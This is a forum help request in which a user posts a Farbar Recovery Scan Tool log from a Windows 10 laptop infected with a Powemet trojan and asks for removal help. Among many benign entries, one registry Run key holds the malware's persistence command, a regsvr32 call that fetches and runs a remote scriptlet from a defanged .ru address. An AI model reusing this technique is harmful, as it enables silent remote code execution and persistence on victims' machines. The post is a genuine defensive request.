Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Behavior:Win32/Powemet.B!attk trojan


  • This topic is locked This topic is locked
9 replies to this topic

#1 AznanZ

AznanZ

  • Members
  • 5 posts
  • OFFLINE
  •  

Posted 01 September 2017 - 08:10 AM

Hi

my laptop is running windows 10 pro, infected by this powemet virus from a friend's flashdrive, she didn't even know there was a virus there, i've done a scan using spyhunter 4 and the result is 0, it can't detect it, please help! everytime i boot it up it'll detect, quarantine, and removed, boot and it's all the same. i've done this farbar recovery and here's the result. please help!

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-08-2017 01
Ran by Aezia (administrator) on AEZIA (01-09-2017 19:48:33)
Running from C:\Users\Aezia Aznan\Downloads
Loaded Profiles: Aezia (Available Profiles: Aezia)
Platform: Windows 10 Pro Version 1703 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Arcai.com) C:\Program Files (x86)\netcut\services\aips.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Atheros Communications, Inc.) C:\Program Files (x86)\Jumpstart\jswpbapi.exe
(AnchorFree Inc.) C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(CyberLink) C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
() C:\Program Files\Sades 7.1CH Gaming Headset\CPL\FaceLift_x64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(© 2015 Microsoft Corporation) C:\Users\Aezia Aznan\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-19] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8510680 2015-07-23] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1394392 2015-07-23] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => C:\Program Files\Dell\QuickSet\QuickSet.exe [3877936 2015-06-12] (Dell Inc.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [16286840 2016-08-30] (Logitech Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [558496 2014-02-28] (Adobe Systems Incorporated)
HKLM\...\Run: [Cm108BSound] => C:\Program Files\Sades 7.1CH Gaming Headset\CPL\FaceLift_x64.exe [2341376 2014-11-10] ()
HKLM\...\Run: [WavesSvc] => C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [600496 2015-07-07] (Waves Audio Ltd.)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [454792 2016-05-25] (Power Software Ltd)
HKLM-x32\...\Run: [jswtrayutil] => C:\Program Files (x86)\Jumpstart\jswtrayutil.exe [528384 2008-09-26] (Atheros Communications, Inc.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [4015216 2017-06-23] (Tonec Inc.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3071776 2017-08-25] (Valve Corporation)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-27] (Piriform Ltd)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [DriverAgent Plus] => C:\ProgramData\DriverAgentPlus\DriverAgentPlus.exe [6122488 2016-10-12] ()
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [BingSvc] => C:\Users\Aezia Aznan\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27716568 2017-05-04] (Skype Technologies S.A.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.39slxu3bw.ru/deploy.xml scrobj.dll <==== ATTENTION
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Run: [GoogleChromeAutoLaunch_47C3CADE9C76B60CAF4A436AF4AD6798] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1301848 2017-08-23] (Google Inc.)
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [228864 2017-03-19] (Microsoft Corporation)
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter "C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MobileGo Service.lnk [2017-03-26]
ShortcutTarget: MobileGo Service.lnk -> C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe (Wondershare)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScpToolkit Tray Notifications.lnk [2017-07-11]
ShortcutTarget: ScpToolkit Tray Notifications.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe (Scarlet.Crush Productions)
GroupPolicyScripts: Restriction <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: 127.0.0.1 cap.cyberlink.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{35d19de6-cf13-434e-a94e-31b23d41171c}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{5edcc3f5-7431-424e-be6c-4c4416c03462}: [DhcpNameServer] 10.254.0.1
Tcpip\..\Interfaces\{a9a7afba-db52-47f6-9ea2-8d672d364d0e}: [DhcpNameServer] 192.168.1.254
 
Internet Explorer:
==================
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/id-id/?ocid=iehp
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2017-06-23] (Internet Download Manager, Tonec Inc.)
BHO: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26] (Intel Security)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2016-05-27] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2016-05-17] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2017-06-23] (Internet Download Manager, Tonec Inc.)
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-06-26] (Intel Security)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2016-05-17] (Microsoft Corporation)
Toolbar: HKLM - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26] (Intel Security)
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-06-26] (Intel Security)
Toolbar: HKU\S-1-5-21-3909864297-3729878400-1751894149-1001 -> True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-06-26] (Intel Security)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-05-20] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Aezia Aznan\AppData\Roaming\Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741 [2017-09-01]
FF Homepage: Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741 -> www.google.com
FF Extension: (True Key Add-On) - C:\Users\Aezia Aznan\AppData\Roaming\Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741\Extensions\@true-key [2016-11-11]
FF Extension: (Adblock Plus) - C:\Users\Aezia Aznan\AppData\Roaming\Mozilla\Firefox\Profiles\w4qqqkc1.default-1478014215741\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-08]
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF HKLM-x32\...\Firefox\Extensions: [youcam@cyberlink.com] - C:\Program Files (x86)\CyberLink\YouCam7\BrowserExtension\Firefox => not found
FF HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Aezia Aznan\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Aezia Aznan\AppData\Roaming\IDM\idmmzcc5 [2017-06-26] [not signed]
FF HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-10-03] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-10-03] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-05-27] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin HKU\S-1-5-21-3909864297-3729878400-1751894149-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2017-02-15] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-05-27] (Microsoft Corporation)
 
Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR Profile: C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default [2017-09-01]
CHR Extension: (Google Slides) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-21]
CHR Extension: (Google Docs) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-21]
CHR Extension: (Google Drive) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-21]
CHR Extension: (YouTube) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-21]
CHR Extension: (Adblock Plus) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-07-22]
CHR Extension: (Tampermonkey) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-22]
CHR Extension: (Love is Love) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbakekmnaeckpbfbkaeadjhfciappjkj [2017-04-10]
CHR Extension: (Google Sheets) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-21]
CHR Extension: (MSN Homepage) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkkcgfbgohboipdhliafmacjnhjbhmim [2017-05-26]
CHR Extension: (Google Docs Offline) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-22]
CHR Extension: (AdBlock) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-08-18]
CHR Extension: (Grammarly for Chrome) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-08-28]
CHR Extension: (IDM Integration Module) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2017-07-19]
CHR Extension: (Hotspot Shield VPN Free Proxy – Unblock Sites) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2017-08-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-30]
CHR Extension: (Gmail) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-21]
CHR Extension: (Chrome Media Router) - C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-11]
CHR Profile: C:\Users\Aezia Aznan\AppData\Local\Google\Chrome\User Data\System Profile [2017-08-31]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-06-23]
CHR HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fkkcgfbgohboipdhliafmacjnhjbhmim] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-06-23]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AIPS; C:\Program Files (x86)\netcut\services\AIPS.exe [262144 2011-07-28] (Arcai.com) [File not signed]
R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [323152 2015-06-07] (Windows ® Win 7 DDK provider)
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [5632 2017-08-31] (Microsoft Corporation)
S2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell)
S2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [394944 2016-04-12] (Scarlet.Crush Productions)
R2 hshld; C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe [2664568 2016-11-23] (AnchorFree Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373760 2016-11-07] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
R3 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
R2 jswpbapi; C:\Program Files (x86)\Jumpstart\jswpbapi.exe [265216 2008-09-26] (Atheros Communications, Inc.) [File not signed]
S3 jswpsapi; C:\Program Files (x86)\Jumpstart\jswpsapi.exe [954368 2008-09-26] (Atheros Communications, Inc.) [File not signed]
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-08-30] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-27] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-27] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-27] (NVIDIA Corporation)
S3 OpenVPNService; C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe [32384 2016-10-03] (The OpenVPN Project)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2157456 2017-06-11] (Electronic Arts)
S2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3127192 2017-06-11] (Electronic Arts)
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [66872 2017-05-25] ()
R2 PnkBstrB; C:\WINDOWS\SysWOW64\PnkBstrB.exe [103736 2017-05-25] ()
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [614664 2014-10-20] (CyberLink)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [298200 2015-07-23] (Realtek Semiconductor)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-19] (Microsoft Corporation)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [263264 2017-02-16] (Synaptics Incorporated)
S2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [1001920 2017-06-26] (McAfee, Inc.)
S2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [16928 2017-06-26] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [87760 2017-06-26] (McAfee, Inc.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-19] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-07-11] (Microsoft Corporation)
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.3.2.220\WsAppService.exe [441344 2017-01-05] (Wondershare) [File not signed]
S3 WsDrvInst; C:\Program Files (x86)\Wondershare\MobileGo\DriverInstall.exe [116368 2016-05-26] (Wondershare)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AFTrafMgr1.1; C:\Program Files (x86)\Hotspot Shield\bin\TrafMgr_1_1_64.sys [54712 2016-11-09] (AnchorFree Inc.)
S3 clwvd7; C:\WINDOWS\system32\DRIVERS\clwvd7.sys [42968 2015-03-24] (CyberLink Corporation)
S3 CMUAC; C:\WINDOWS\system32\DRIVERS\CMUAC.sys [613888 2014-10-09] (C-MEDIA)
R3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [19440 2015-05-08] (OSR Open Systems Resources, Inc.)
S3 esgiguard; E:\AntiVirus\SpyHunter.4.27.1.4835.KaranPC\SpyHunter\esgiguard.sys [16432 2017-07-13] (Enigma Software Group USA, LLC.)
R3 iaLPSS_GPIO; C:\WINDOWS\System32\drivers\iaLPSS_GPIO.sys [46856 2015-06-15] (Intel Corporation)
R3 iaLPSS_UART2; C:\WINDOWS\System32\drivers\iaLPSS_UART2.sys [155400 2015-06-15] (Intel Corporation)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
